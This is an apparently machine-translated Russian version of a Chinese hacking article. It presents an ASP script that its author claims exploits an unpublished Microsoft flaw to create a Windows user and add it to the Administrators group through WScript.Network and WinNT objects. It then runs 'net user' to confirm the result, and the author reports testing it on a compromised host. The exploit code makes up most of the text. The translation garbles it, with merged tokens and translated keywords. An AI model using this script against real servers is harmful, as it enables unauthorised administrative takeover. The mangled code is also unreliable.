Добавлен код .asp Super пользователя [оригинал синего экрана, Kevin Unferment, MS неопубликованная уязвимость

Добавлен код Super пользователя.

Автор: Синий экран, Статья Кевина Источник: Forzing Point Extreme

На самом деле, Кевин и я проверили его на моем бройлере на прошлой неделе, и бегемота. В результате пользователи группы администраторов были успешно добавлены в соответствии с разрешениями пользователей (хотя я не могу поверить своим глазам).

В прошлый раз, когда Кевин ничего не сказал, я не смел опубликовать это ... теперь я видел, как он публикует его в своем блоге, поэтому я перевел его (это было немного лучше, чем когда я проверил ее в прошлый раз, и я добавил форму). Теперь мне повезло для всех `` `

Во всяком случае, код верен, но он редко удается, он зависит от удачи. Полем Ха -ха, следующий шаг я хочу интегрировать его в океан. Эй, Хей.

Кода -копия выглядит следующим образом:

<Head> .network Object Script Script Learning Exploit Tool </Head>

<formaction = "userAdd.asp" method = post>

Пользователь: <inputname = "username" type = "text" value = "kevin1986"> <br>

Пароль: <inputname = "passwd" type = "пароль"> <br>

<inputType = "отправить" value = "add">

</form>

<%@CodePage = 936

OnerRorResumenext

ifrequest.servervariables ("remote_addr") <> "127.0.0.1" Тогда

response.write "ip! sn0tright"

еще

ifrequest ("имя пользователя") <> "" Тогда

Имя пользователя = запрос («Имя пользователя»)

passwd = request ("passwd")

Response.expires = 0

Session.Timeout = 50

Server.ScriptTimeout = 3000

setlp = server.createObject ("wscript.network")

oz = "winnt: //" & lp.computername

SetOb = getObject (унция)

Setoe = getObject (oz & "/Administrators, Group")

Setod = ob.create («Пользователь», имя пользователя)

od.setpasswordpasswd

od.setinfo

oe.addoz & "/" & username

Iferrthen

Ответ.write "Эй ~~ ты не должен покупать 6+1 сегодня ... Лучше сэкономить 2 юаня, чтобы купить бутылку колы ..."

еще

ifinstr (server.createObject ("wscript.shell"). exec ("cmd.exe/cnetuser" & username.stdout.readall), "Последний логин")> 0then

response.write «Хотя ошибки нет, кажется, что она не была успешно установлена. Вы должны быть очень подавленными».

еще

Response.write "OMG!" & Arneman и "Имя и" Аккаунт "на самом деле стал! Это неизвестная лазейка. 5 000 000rmb это ваша".

эндиф

эндиф

еще

response.write "Пожалуйста, введите имя пользователя"

эндиф

эндиф

%>

Статьи, которые могут вас заинтересовать:

Отклоните экстра-звездную систему управления виртуальными хостами, Super User FreehoStrunat удаленного рабочего стола, улучшить систему безопасности, различные скрытые методы добавления суперпользователя, извлечь пароль Super User Redhat Linux 7.2, метод добавления суперпользователя к обычным пользователям.